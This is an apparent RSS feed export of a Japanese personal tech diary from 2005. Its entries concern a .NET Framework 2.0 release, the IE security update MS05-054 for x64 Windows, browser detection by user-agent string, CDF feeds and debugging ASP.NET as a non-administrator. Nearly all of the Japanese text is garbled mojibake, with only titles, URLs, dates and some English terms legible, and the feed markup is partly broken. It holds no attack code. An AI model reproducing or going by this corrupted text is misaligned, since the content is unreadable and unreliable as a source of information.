    cookie₪ָ₪₪₪¦¸»ת־ף₪ע÷ן½₪¹₪כ₪ָ₪₪₪¦½טֽ‎₪¬₪«₪«₪ֳ₪ֶ₪₪₪כ₪ָ₪ֿ¡£₪₪¡¡¢ּ₪ֻ₪ן₪¶₪ן₪¶¼ט₪כ¥³¡¼¥ֹ₪ֻ₪»₪÷₪ָ₪ג¥¹¥¯¥ך¥׳¥ָ₪¬ֶ°₪¯₪³₪ָ₪ע¼¨₪»₪ל₪׀₪ט₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡£

    -

    ₪₪¡₪₪ף₪ֻ₪·₪ֶ₪ג¡¢´ם¸±₪₪ג₪־₪ע¼ט₪ך½₪₪₪ֶ₪·₪ֶ°ֱֲ´₪₪ג₪־₪ְ₪±ֽרֽׁ₪ַ₪­₪כ₪ט₪¦₪ֻ₪¹₪כ₪ָ₪₪₪¦₪־₪ֶֿס₪·₪₪₪³₪ָ₪ְ₪¡¼₪ָ²‏₪ב₪ֶ»׳₪ֳ₪¿₪־₪ַ₪·₪¿¡£

    -]]>
    -
    - - »כ־ֿ 2.0 - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051223-1 - 2005-12-23 - ₪³₪ל₪«₪י₪־»‏ֲו₪ֿ»כ־ֿ 2.0! ¥י¥ף¥ֹ¥כ¥ָ´ִ(C₪₪¿₪₪₪₪ה₪ִ)₪ע»ָ₪ֳ₪ֶ₪₪₪כ₪¦₪ֱ₪ֿ»כ־ֿ 1.0₪י₪·₪₪₪ַ₪¹¡£ ₪¿₪₪¿₪¡ײ»כ־ֿ 2.0¡׳₪ָ₪₪₪¦₪־₪ע¸«₪ֶ¡ײ₪¢¡¼¡¢₪₪¿2.0₪«¡¼¡׳₪ָ₪«ֱַ₪ַ»׳₪ֳ₪ֶ₪·₪₪ֳ₪¿₪־₪ַ₪¹¡£₪½¡¼₪ז¡¼»‏ֲו₪₪־₪ַ₪¹₪ֽ¡£₪ֱ₪¬₪¦₪ֱ₪¬₪¦¡£ - -

    ₪³₪ל₪«₪י₪־»‏ֲו₪ֿ»כ־ֿ 2.0!

    -

    ¥י¥ף¥ֹ¥כ¥ָ´ִ(C₪₪¿₪₪₪₪ה₪ִ)₪ע»ָ₪ֳ₪ֶ₪₪₪כ₪¦₪ֱ₪ֿ»כ־ֿ 1.0₪י₪·₪₪₪ַ₪¹¡£

    -

    ₪¿₪₪¿₪¡ײ»כ־ֿ 2.0¡׳₪ָ₪₪₪¦₪־₪ע¸«₪ֶ¡ײ₪¢¡¼¡¢₪₪¿2.0₪«¡¼¡׳₪ָ₪«ֱַ₪ַ»׳₪ֳ₪ֶ₪·₪₪ֳ₪¿₪־₪ַ₪¹¡£₪½¡¼₪ז¡¼»‏ֲו₪₪־₪ַ₪¹₪ֽ¡£₪ֱ₪¬₪¦₪ֱ₪¬₪¦¡£

    -]]>
    -
    - - Microsoft .NET Framework 2.0 ֶֻ¸ל - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-1 - 2005-12-15 - ¥ְ¥¦¥ף¥ם¡¼¥ֹ¥»¥ף¥¿¡¼₪ֻ¸ְ¸ל¥ׁ¥ֳ¥±¡¼¥¸₪ָSDK₪¬ֵ׀¾ל¡£ SDK₪־¥₪¥ף¥¹¥ָ¡¼¥כ₪ֻ₪ְֿט₪ֻ÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸₪ָ¸ְ¸ל¥ׁ¥ֳ¥±¡¼¥¸₪־¥₪¥ף¥¹¥ָ¡¼¥כ₪¬ֹ¬ֽ׳₪ַ₪¹¡£₪·₪׀₪י₪¯(¿פֳֶז₪ָ₪₪₪¦°ױּ£₪ַ₪ֿ₪₪₪)₪¹₪כ₪ֶָֻ¸ל÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸₪¬½׀₪כ₪«₪ג? x86÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK x64÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK IA64÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK - -

    ¥ְ¥¦¥ף¥ם¡¼¥ֹ¥»¥ף¥¿¡¼₪ֻ¸ְ¸ל¥ׁ¥ֳ¥±¡¼¥¸₪ָSDK₪¬ֵ׀¾ל¡£

    -

    SDK₪־¥₪¥ף¥¹¥ָ¡¼¥כ₪ֻ₪ְֿט₪ֻ÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸₪ָ¸ְ¸ל¥ׁ¥ֳ¥±¡¼¥¸₪־¥₪¥ף¥¹¥ָ¡¼¥כ₪¬ֹ¬ֽ׳₪ַ₪¹¡£₪·₪׀₪י₪¯(¿פֳֶז₪ָ₪₪₪¦°ױּ£₪ַ₪ֿ₪₪₪)₪¹₪כ₪ֶָֻ¸ל÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸₪¬½׀₪כ₪«₪ג?

    -
    -
    x86
    ÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK
    -
    x64
    ÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK
    -
    IA64
    ÷ֶַֹ¥ׁ¥ֳ¥±¡¼¥¸, Language Package, SDK
    -
    - - -]]>
    -
    - - Internet Explorer ֽׁ₪־־ְֵׁ×₪¥»¥­¥ו¥ך¥ֶ¥£¹¹¿·¥׳¥ם¥°¥י¥א (905915) (MS05-054) - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-2 - 2005-12-15 - ₪³₪־¥¢¥ֳ¥׳¥ַ¡¼¥ָ₪₪־₪ַ₪¹₪¬Windows XP Professional x64 Edition₪ֻ₪ִ₪₪₪ֶ₪ֿ¼¡₪־₪ט₪¦₪ֻ₪¢₪ך₪₪¹¡£ ֳם: x86 °³°₪־¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף₪ֻ₪ִ₪₪₪ֶ₪־¿¼¹ןֵ₪ֿ¡¢¼¡₪־ x86 ¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף₪ֶָ±₪¸₪ַ₪¹¡£ Windows XP Professional x64 Edition ¾ו₪־ Internet Explorer 6 ₪־¿¼¹ןֵ₪ֿ¡¢Internet Explorer 6 Service Pack 1 (Windows Server 2003 °ֱ°₪־₪¹₪₪ֶ₪־¥µ¥¡¼¥ָ₪µ₪ל₪ֶ₪₪₪כ¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף) ₪־¿¼¹ןֵ₪ֶָ±₪¸₪ַ₪¹¡£ Microsoft Windows Server 2003 for Itanium-based Systems ₪×₪ט₪׃ Windows Server 2003 x64 Edition ¾ו₪־ Internet Explorer 6 ₪־¿¼¹ןֵ₪ֿ¡¢Windows Server 2003 ¾ו₪־ Internet Explorer 6 ₪ֶָ±₪¸₪ַ₪¹¡£ ₪ַ₪גWindows Server 2003¥¡¼¥¹₪XP x64₪ֿWSvr 2k3₪ֶָ±₪¸₪ֿ₪÷₪₪־₪ַ₪ֿ?₪ָ¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ע¸«₪¿₪י¡ִ Windows XP x64 Edition ֽׁ Internet Explorer ₪־¥»¥­¥ו¥ך¥ֶ¥£¹¹¿·¥׳¥ם¥°¥י¥א (KB905915) Windows Server 2003 x64 Edition ֽׁ Internet Explorer ₪־¥»¥­¥ו¥ך¥ֶ¥£¹¹¿·¥׳¥ם¥°¥י¥א (KB905915) WindowsServer2003.WindowsXP-KB905915-x64-JPN.exe₪ֶַ±₪¸¥ױ¥¡¥₪¥כ₪ַ₪·₪¿¡£₪ג₪ֱ₪ם₪ףֶ±₪¸¥ױ¥¡¥₪¥כ₪ְ₪«₪י₪ָ₪₪₪ֳ₪ֶ¸µ¡¹₪־±ֶ¶ֱ₪גֶ±₪¸₪«₪ֹ₪¦₪«₪ָ₪₪₪¨₪׀ּ₪ַ₪¹₪¬¡£ - -

    ₪³₪־¥¢¥ֳ¥׳¥ַ¡¼¥ָ₪₪־₪ַ₪¹₪¬Windows XP Professional x64 Edition₪ֻ₪ִ₪₪₪ֶ₪ֿ¼¡₪־₪ט₪¦₪ֻ₪¢₪ך₪₪¹¡£

    -
    -

    ֳם: x86 °³°₪־¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף₪ֻ₪ִ₪₪₪ֶ₪־¿¼¹ןֵ₪ֿ¡¢¼¡₪־ x86 ¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף₪ֶָ±₪¸₪ַ₪¹¡£

    -
      -
    • Windows XP Professional x64 Edition ¾ו₪־ Internet Explorer 6 ₪־¿¼¹ןֵ₪ֿ¡¢Internet Explorer 6 Service Pack 1 (Windows Server 2003 °ֱ°₪־₪¹₪₪ֶ₪־¥µ¥¡¼¥ָ₪µ₪ל₪ֶ₪₪₪כ¥×¥¥ל¡¼¥ֶ¥£¥ף¥° ¥·¥¹¥ֶ¥א₪־¥׀¡¼¥¸¥ח¥ף) ₪־¿¼¹ןֵ₪ֶָ±₪¸₪ַ₪¹¡£
    • -
    • Microsoft Windows Server 2003 for Itanium-based Systems ₪×₪ט₪׃ Windows Server 2003 x64 Edition ¾ו₪־ Internet Explorer 6 ₪־¿¼¹ןֵ₪ֿ¡¢Windows Server 2003 ¾ו₪־ Internet Explorer 6 ₪ֶָ±₪¸₪ַ₪¹¡£
    • -
    -

    ₪ַ₪גWindows Server 2003¥¡¼¥¹₪XP x64₪ֿWSvr 2k3₪ֶָ±₪¸₪ֿ₪÷₪₪־₪ַ₪ֿ?₪ָ¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ע¸«₪¿₪י¡ִ

    - -

    WindowsServer2003.WindowsXP-KB905915-x64-JPN.exe₪ֶַ±₪¸¥ױ¥¡¥₪¥כ₪ַ₪·₪¿¡£₪ג₪ֱ₪ם₪ףֶ±₪¸¥ױ¥¡¥₪¥כ₪ְ₪«₪י₪ָ₪₪₪ֳ₪ֶ¸µ¡¹₪־±ֶ¶ֱ₪גֶ±₪¸₪«₪ֹ₪¦₪«₪ָ₪₪₪¨₪׀ּ₪ַ₪¹₪¬¡£

    -]]>
    -
    - - ToHeart2.exe - http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051211-1 - 2005-12-11 - ₪ױ₪ָ¡¢¥י¥₪¥ײ¥י¥ך₪עַֹ₪¹₪כ₪ָ₪­₪ֻ¡ײ₪³₪־¥י¥₪¥ײ¥י¥ך₪עֶ°ֵס¦ְֵֵ×¥ך¥ף¥¯₪עּה₪ן₪÷ֽרֽׁ₪·₪¿¾ל¹ח¡¢¥½¥ױ¥ָ¥¦¥§¥¢₪־¥½¡¼¥¹¥³¡¼¥ֹ₪ע¸ר³«₪·₪ֶ₪ֿ₪₪י₪₪₪¡׳₪ָ₪₪₪¦¥י¥₪¥»¥ף¥¹₪ֻ₪·₪ֶ₪×₪₪₪ֶ¡¢²¿₪ג¹ֽ₪¨₪₪₪³«ָ¯¼װ₪¬₪¦₪ֳ₪«₪ךGPL₪ָ÷®₪¼₪ֶ¡¢₪µ₪¢ֲחׁ!₪ָ₪₪₪¦¥ֽ¥¿₪ע»׳₪₪₪ִ₪₪₪¿¡£ - -

    ₪ױ₪ָ¡¢¥י¥₪¥ײ¥י¥ך₪עַֹ₪¹₪כ₪ָ₪­₪ֻ¡ײ₪³₪־¥י¥₪¥ײ¥י¥ך₪עֶ°ֵס¦ְֵֵ×¥ך¥ף¥¯₪עּה₪ן₪÷ֽרֽׁ₪·₪¿¾ל¹ח¡¢¥½¥ױ¥ָ¥¦¥§¥¢₪־¥½¡¼¥¹¥³¡¼¥ֹ₪ע¸ר³«₪·₪ֶ₪ֿ₪₪י₪₪₪¡׳₪ָ₪₪₪¦¥י¥₪¥»¥ף¥¹₪ֻ₪·₪ֶ₪×₪₪₪ֶ¡¢²¿₪ג¹ֽ₪¨₪₪₪³«ָ¯¼װ₪¬₪¦₪ֳ₪«₪ךGPL₪ָ÷®₪¼₪ֶ¡¢₪µ₪¢ֲחׁ!₪ָ₪₪₪¦¥ֽ¥¿₪ע»׳₪₪₪ִ₪₪₪¿¡£

    -]]>
    -
    - - Gecko ·ֿ¥ײ¥י¥¦¥¶₪־ָ½ּ¡¢ Safari ₪ה₪½₪־ְַֹ¸¥ײ¥י¥¦¥¶₪־ָ½ּ - http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-1 - 2005-11-28 - ₪³₪ל₪י AppleWebKit ·ֿ¥ײ¥י¥¦¥¶₪¿₪ֱ₪ע₪ׂ₪ָ₪₪ָ₪ב₪ָֻ½ּ₪¹₪כ÷¡¢₪₪¯₪ֿ &quot;AppleWebKit&quot; ₪־¸»ת־ף₪ע¸«₪ֶ₪₪¹¡£¥ײ¥י¥¦¥¶ָ½ּ₪־¼חֵֽׁ׃₪ֿ¡¢¥ל¥ף¥ְ¥ך¥ף¥°¥¨¥ף¥¸¥ף₪ג₪·₪¯₪ֿ JavaScript ¥¨¥ף¥¸¥ף₪־÷¹°₪ֱֻ°₪ג₪ֳ₪ֶµ₪ֹױ₪¯₪¿₪ב₪ַ₪¢₪ך¡¢₪½₪־÷¹°₪עְ¸₪ף₪ַ₪₪₪כ₪ג₪־¡¦ס³ח₪¹₪כ₪ג₪־₪ֿ¡¢₪ה₪ֳ₪ׁ₪ך &quot;AppleWebKit&quot; ₪ְ₪ָ»׳₪¦₪־₪ַ¡£ ₪ױ₪א₪א¡¢Safari·ֿ₪ָ₪₪₪¦₪«AppleWebKit·ֿ₪־¥ײ¥י¥¦¥¶₪ג₪¢₪ֳ₪¿₪־₪ַ₪¹₪ֽ¡£₪¹₪ֳ₪«₪ך¼÷ַ°₪·₪ֶ₪₪₪₪·₪¿¡£ AppleWebKit₪ע»ָ₪ֳ₪¿¾ל¹ח¡¢Safari₪¬ּµֽ‎₪ה₪ךֻה₪ב¹‏₪₪ל₪כ₪₪י₪₪₪₪₪±₪ל₪ֹ¡¢₪½₪¦₪ַ₪ֿ₪₪₪¾ל¹ח₪ֻ₪ֱ₪ח₪ֳ₪ָ÷₪₪ֳ₪¿₪³₪ָ₪¬µ¯₪³₪כ₪«₪ג₪·₪ל₪₪₪₪ַ₪¹₪ֽ¡£Safari ₪־µ¶ֱץ₪ע²ע₪¯»צ₪ֹֿװ²ִַ½₪ָ₪₪₪¦₪³₪ָ₪ֿ¡¢¶¯ְ©ֵ×₪ֻֻה₪ב¹‏₪₪ל₪כ₪ֳ₪ֶ₪³₪ָ₪₪־₪«₪¡£ - -

    ₪³₪ל₪י AppleWebKit ·ֿ¥ײ¥י¥¦¥¶₪¿₪ֱ₪ע₪ׂ₪ָ₪₪ָ₪ב₪ָֻ½ּ₪¹₪כ÷¡¢₪₪¯₪ֿ "AppleWebKit" ₪־¸»ת־ף₪ע¸«₪ֶ₪₪¹¡£¥ײ¥י¥¦¥¶ָ½ּ₪־¼חֵֽׁ׃₪ֿ¡¢¥ל¥ף¥ְ¥ך¥ף¥°¥¨¥ף¥¸¥ף₪ג₪·₪¯₪ֿ JavaScript ¥¨¥ף¥¸¥ף₪־÷¹°₪ֱֻ°₪ג₪ֳ₪ֶµ₪ֹױ₪¯₪¿₪ב₪ַ₪¢₪ך¡¢₪½₪־÷¹°₪עְ¸₪ף₪ַ₪₪₪כ₪ג₪־¡¦ס³ח₪¹₪כ₪ג₪־₪ֿ¡¢₪ה₪ֳ₪ׁ₪ך "AppleWebKit" ₪ְ₪ָ»׳₪¦₪־₪ַ¡£

    -

    ₪ױ₪א₪א¡¢Safari·ֿ₪ָ₪₪₪¦₪«AppleWebKit·ֿ₪־¥ײ¥י¥¦¥¶₪ג₪¢₪ֳ₪¿₪־₪ַ₪¹₪ֽ¡£₪¹₪ֳ₪«₪ך¼÷ַ°₪·₪ֶ₪₪₪₪·₪¿¡£

    -

    AppleWebKit₪ע»ָ₪ֳ₪¿¾ל¹ח¡¢Safari₪¬ּµֽ‎₪ה₪ךֻה₪ב¹‏₪₪ל₪כ₪₪י₪₪₪₪₪±₪ל₪ֹ¡¢₪½₪¦₪ַ₪ֿ₪₪₪¾ל¹ח₪ֻ₪ֱ₪ח₪ֳ₪ָ÷₪₪ֳ₪¿₪³₪ָ₪¬µ¯₪³₪כ₪«₪ג₪·₪ל₪₪₪₪ַ₪¹₪ֽ¡£Safari ₪־µ¶ֱץ₪ע²ע₪¯»צ₪ֹֿװ²ִַ½₪ָ₪₪₪¦₪³₪ָ₪ֿ¡¢¶¯ְ©ֵ×₪ֻֻה₪ב¹‏₪₪ל₪כ₪ֳ₪ֶ₪³₪ָ₪₪־₪«₪¡£

    - - -]]>
    -
    - - ₪ְ₪ֳ₪·₪ו - http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-2 - 2005-11-28 - ₪ױ₪ָ»׳₪ֳ₪ֱֶ°¶‏₪°₪₪₪ֳ₪ָ₪ה₪ֳ₪ֶ₪₪¿₪י¡¢₪µ₪¹₪¬₪ֻ¥¥₪¥¥¹40₪ֿ₪₪₪₪±₪ל₪ֹ¡¢¥¥₪¥¥¹14₪°₪י₪₪? ֵֻצ₪ֿ₪₪ְ₪₪ְ₪ַ₪­₪כ₪ַ₪¹¡£₪¢₪־¥ױ¥ל¡¼¥÷₪עִ°₪¯₪¿₪׃6¹ז₪µ₪ף₪¬ֱ°¶‏₪·₪ֶ₪₪₪כ¿₪¬»׳₪₪ֹג₪«₪׃₪₪¹¡£ ²«¿§₪₪¥׀¥«¥ף¥¹»ָ₪₪₪¹₪®! ₪¯₪כ₪ Ver₪¬¹¥₪­₪ַ₪¹! - -

    ₪ױ₪ָ»׳₪ֳ₪ֱֶ°¶‏₪°₪₪₪ֳ₪ָ₪ה₪ֳ₪ֶ₪₪¿₪י¡¢₪µ₪¹₪¬₪ֻ¥¥₪¥¥¹40₪ֿ₪₪₪₪±₪ל₪ֹ¡¢¥¥₪¥¥¹14₪°₪י₪₪? ֵֻצ₪ֿ₪₪ְ₪₪ְ₪ַ₪­₪כ₪ַ₪¹¡£₪¢₪־¥ױ¥ל¡¼¥÷₪עִ°₪¯₪¿₪׃6¹ז₪µ₪ף₪¬ֱ°¶‏₪·₪ֶ₪₪₪כ¿₪¬»׳₪₪ֹג₪«₪׃₪₪¹¡£

    -

    ²«¿§₪₪¥׀¥«¥ף¥¹»ָ₪₪₪¹₪®! ₪¯₪כ₪ Ver₪¬¹¥₪­₪ַ₪¹!

    - - -]]>
    -
    - - ₪ה₪ֳ₪ׁ₪ך - http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-3 - 2005-11-28 - ֶ¬₪־³¨₪ֿ₪½₪־₪₪₪ַ¡£₪ב₪ף₪ֹ₪¯₪µ₪₪₪־₪ַ₪¹¡£ ₪¢₪ָ¡¢¥ױ¥©¥ף¥ָ₪ע»״ִך₪·₪¿₪«₪י₪₪־₪«₪₪³₪¹₪ֶ₪ף₪־Gecko·ֿ(Camino, Firefox)₪ַ¥¬¥¿¥¬¥¿₪ֻ₪₪ֳ₪ֶ₪₪₪¿₪־₪¬ִ¾₪ֳ₪ֶ₪¿¡£ - -

    ֶ¬₪־³¨₪ֿ₪½₪־₪₪₪ַ¡£₪ב₪ף₪ֹ₪¯₪µ₪₪₪־₪ַ₪¹¡£

    -

    ₪¢₪ָ¡¢¥ױ¥©¥ף¥ָ₪ע»״ִך₪·₪¿₪«₪י₪₪־₪«₪₪³₪¹₪ֶ₪ף₪־Gecko·ֿ(Camino, Firefox)₪ַ¥¬¥¿¥¬¥¿₪ֻ₪₪ֳ₪ֶ₪₪₪¿₪־₪¬ִ¾₪ֳ₪ֶ₪¿¡£

    - - -]]>
    -
    - - CDF - http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-4 - 2005-11-28 - ₪ְ₪₪₪ײֱ°₪«₪י₪ַ₪¹₪¬RSS₪ָ¹ח₪ן₪»₪ֶ¡¢(₪₪₪₪²ֳ¸÷₪₪¬₪י₪ג)CDF₪עְ¸ְ®₪·₪ֶ₪₪₪₪¹¡£CDF»ָ₪¦!₪ֳ₪ֶ¿ֽ₪ֿ₪ֹ₪¦₪¾(/channel.cdf)¡£¥¥¸¥×¥¹¥¹¥ב(₪₪¦₪ט₪) - -

    ₪ְ₪₪₪ײֱ°₪«₪י₪ַ₪¹₪¬RSS₪ָ¹ח₪ן₪»₪ֶ¡¢(₪₪₪₪²ֳ¸÷₪₪¬₪י₪ג)CDF₪עְ¸ְ®₪·₪ֶ₪₪₪₪¹¡£CDF»ָ₪¦!₪ֳ₪ֶ¿ֽ₪ֿ₪ֹ₪¦₪¾(/channel.cdf)¡£¥¥¸¥×¥¹¥¹¥ב(₪₪¦₪ט₪)

    - - -]]>
    -
    - - XP(x86)¾ו₪ְַ©¸ֲ¥ז¡¼¥¶(Users)₪ָ₪·₪ֶ¥ם¥°¥×¥ף₪·₪ֶASP.NET₪ע¥ַ¥׀¥ֳ¥°₪¹₪כ¡£ - http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-5 - 2005-11-28 - ֹבֳ₪ֿUsers₪ָ₪·₪ֶ¥ם¥°¥×¥ף₪·₪ֶ₪₪₪כ₪־₪ַ₪¹₪¬¡¢₪³₪־¾ל¹ח°ֶ³°ֵּּ₪ָ₪₪₪¦₪³₪ָ₪¬₪ן₪«₪ך₪₪·₪¿¡£·כְֿ₪«₪י¸ְ₪¦₪ָ¥ם¡¼¥«¥כ₪־Administrators₪ֻ½ךֲ°₪µ₪»₪ֶ₪·₪₪¦₪«W2k3₪ע²¾ֱ¥¥·¥ף₪ֶֻ‏₪ל₪כ₪«₪¹₪כ₪־₪¬₪ט₪µ₪½₪¦¡£ ₪₪÷¥ם¡¼¥«¥כ¥°¥כ¡¼¥׳₪־VS Developers₪ָDebugger Users₪ֶֻ‏₪ל₪ל₪׀₪₪₪₪₪ה¡¼¡¢₪ָ₪«»׳₪ֳ₪¿₪־₪ַ₪¹₪¬₪½₪ל₪ַ₪ֿ¥ְ¥ב₪₪־₪ַ₪·₪¿¡£ ₪½₪ל₪ְ₪±₪ְ₪ָ¥׳¥ם¥¸¥§¥¯¥ָ₪ע¼ֲ¹װ₪·₪ט₪¦₪ָ₪·₪ֶ₪₪₪כ₪ָ₪­₪ֻ¥¨¥י¡¼₪¬ָ¯ְ¸₪·₪₪·₪¿ : Web ¥µ¡¼¥׀¡¼₪ַ¥ַ¥׀¥ֳ¥°₪ע³«»ֿ₪ַ₪­₪₪»₪ף¡£¥¢¥¯¥»¥¹₪¬µסָ₪µ₪ל₪₪·₪¿¡£₪ֵָ₪י₪ל₪ֶ₪·₪₪¦₪־₪ַ₪¹¡£₪³₪ל₪ֿ¡¢ aspnet_wp.exe ₪ֿ ASPNET ¥ז¡¼¥¶₪ַ¼ֲ¹װ₪·₪ֶ₪₪₪כ ¥¢¥¿¥ֳ¥ֱ₪ע»מ₪₪¿¥ז¡¼¥¶₪ֿ ASPNET ¥ז¡¼¥¶₪ַ₪ֿ₪₪₪ ¥¢¥¿¥ֳ¥ֱ₪ע»מ₪₪¿¥ז¡¼¥¶₪ֿ Administrators ₪ֻ½ךֲ°₪·₪ֶ₪₪₪₪₪(Administrators ₪ֿ¥ם¥°¥×¥ף₪·₪ֶ₪כ¥ז¡¼¥¶₪ע´״·¸₪₪¯¥¢¥¿¥ֳ¥ֱ₪ַ₪­₪כ) ₪ָ₪₪₪¦₪³₪ָ₪₪־₪ַ₪¹₪¬¡¢₪₪¢ֵצ₪¿₪ךֱ°₪ַ₪¹₪ֽ¡£₪ַ¡¢₪¸₪ד₪¢ aspnet_wp.exe ₪־¼ֲ¹װ¥ז¡¼¥¶₪עׁ¹¹₪·₪ט¡¼₪ָ₪«»׳₪¦₪ָ Machine.config ₪ַ processModel ֽ׳ֱַ₪¢₪¿₪ך₪ע₪₪₪¸₪כ₪³₪ָ₪ֻ₪₪כ₪־₪ַ₪¹¡£ Machine.config ₪ַµ¯ֶ°₪¹₪כ¥ז¡¼¥¶₪ע»״ִך₪¹₪כ₪ֻ₪ֿ¥ױ¥¡¥₪¥כ₪ֻ»ס³¾נף(₪₪₪ן₪ז₪כ¥ׁ¥¹¥ן¡¼¥ֹ)₪עְ¸₪ַ½ס₪¯₪«¡¢»ס³¾נף₪ע¸מ₪·₪¿¾ץֲײ₪ֻ₪·₪ֶ»״ִך₪¹₪כ₪«₪₪־₪ַ₪¹₪¬¡¢¥ׁ¥¹¥ן¡¼¥ְֹ¸₪ֿ₪₪¥ה₪¹₪®₪ַ₪¹₪·¡¢¸מ₪¹₪כ₪־₪גֵּּ₪ַ₪¹(¥³¥¥ף¥ֹ°ל²ף₪ָ₪ֿ₪₪₪¨ִ¶ֵּּ₪¯₪µ₪¬₪ך₪₪־₪ַ)¡£₪ָ₪₪₪¦₪«¡¢₪½₪ג₪½₪ג Machine.config ₪ָ₪«₪₪₪¸₪ך₪¿₪¯₪₪₪₪־₪ַ₪¹₪ט! ₪ֱ₪₪₪ֻ³ֶ¼ן»ס³¾נף(SQL Serverְֲ³¸»ת־ף₪ָ₪«₪ג´₪א)₪ע°ֵ¹ז²½₪·₪ֶ¸מ₪¹₪כ‎ֻ¡₪ֿMSKB₪־ ASP.NET ¥ז¡¼¥ֶ¥£¥ך¥ֶ¥£₪ע»ָֽׁ₪·₪ֶ»ס³¾נף₪×₪ט₪׃¥»¥ֳ¥·¥ח¥ף¾ץֲײ₪־ְֲ³¸»ת־ף₪ע°ֵ¹ז²½₪¹₪כ‎ֻ¡(329290) ₪ע»²¾ָ₪־₪³₪ָ¡£ ₪³₪ל₪¬W2k3(₪ג₪·₪¯₪ֿWindows XP x64 Edition)₪־IIS 6₪₪י¡¢aspnet_wp.exe ₪ֱֻךֵצ₪¹₪כ w3wp.exe ₪עIIS¥¥ֽ¡¼¥¸¥ד₪«₪י´ֳ±₪ֵֻ¬ֵצ₪¥¢¥«¥¦¥ף¥ָ₪ַ¼ֲ¹װ₪ַ₪­₪₪¹¡£ - -

    ֹבֳ₪ֿUsers₪ָ₪·₪ֶ¥ם¥°¥×¥ף₪·₪ֶ₪₪₪כ₪־₪ַ₪¹₪¬¡¢₪³₪־¾ל¹ח°ֶ³°ֵּּ₪ָ₪₪₪¦₪³₪ָ₪¬₪ן₪«₪ך₪₪·₪¿¡£·כְֿ₪«₪י¸ְ₪¦₪ָ¥ם¡¼¥«¥כ₪־Administrators₪ֻ½ךֲ°₪µ₪»₪ֶ₪·₪₪¦₪«W2k3₪ע²¾ֱ¥¥·¥ף₪ֶֻ‏₪ל₪כ₪«₪¹₪כ₪־₪¬₪ט₪µ₪½₪¦¡£

    -

    ₪₪÷¥ם¡¼¥«¥כ¥°¥כ¡¼¥׳₪־VS Developers₪ָDebugger Users₪ֶֻ‏₪ל₪ל₪׀₪₪₪₪₪ה¡¼¡¢₪ָ₪«»׳₪ֳ₪¿₪־₪ַ₪¹₪¬₪½₪ל₪ַ₪ֿ¥ְ¥ב₪₪־₪ַ₪·₪¿¡£

    -

    ₪½₪ל₪ְ₪±₪ְ₪ָ¥׳¥ם¥¸¥§¥¯¥ָ₪ע¼ֲ¹װ₪·₪ט₪¦₪ָ₪·₪ֶ₪₪₪כ₪ָ₪­₪ֻ¥¨¥י¡¼₪¬ָ¯ְ¸₪·₪₪·₪¿ : Web ¥µ¡¼¥׀¡¼₪ַ¥ַ¥׀¥ֳ¥°₪ע³«»ֿ₪ַ₪­₪₪»₪ף¡£¥¢¥¯¥»¥¹₪¬µסָ₪µ₪ל₪₪·₪¿¡£₪ֵָ₪י₪ל₪ֶ₪·₪₪¦₪־₪ַ₪¹¡£₪³₪ל₪ֿ¡¢

    -
      -
    • aspnet_wp.exe ₪ֿ ASPNET ¥ז¡¼¥¶₪ַ¼ֲ¹װ₪·₪ֶ₪₪₪כ
    • -
    • ¥¢¥¿¥ֳ¥ֱ₪ע»מ₪₪¿¥ז¡¼¥¶₪ֿ ASPNET ¥ז¡¼¥¶₪ַ₪ֿ₪₪₪
    • -
    • ¥¢¥¿¥ֳ¥ֱ₪ע»מ₪₪¿¥ז¡¼¥¶₪ֿ Administrators ₪ֻ½ךֲ°₪·₪ֶ₪₪₪₪₪(Administrators ₪ֿ¥ם¥°¥×¥ף₪·₪ֶ₪כ¥ז¡¼¥¶₪ע´״·¸₪₪¯¥¢¥¿¥ֳ¥ֱ₪ַ₪­₪כ)
    • -
    -

    ₪ָ₪₪₪¦₪³₪ָ₪₪־₪ַ₪¹₪¬¡¢₪₪¢ֵצ₪¿₪ךֱ°₪ַ₪¹₪ֽ¡£₪ַ¡¢₪¸₪ד₪¢ aspnet_wp.exe ₪־¼ֲ¹װ¥ז¡¼¥¶₪עׁ¹¹₪·₪ט¡¼₪ָ₪«»׳₪¦₪ָ Machine.config ₪ַ processModel ֽ׳ֱַ₪¢₪¿₪ך₪ע₪₪₪¸₪כ₪³₪ָ₪ֻ₪₪כ₪־₪ַ₪¹¡£

    -

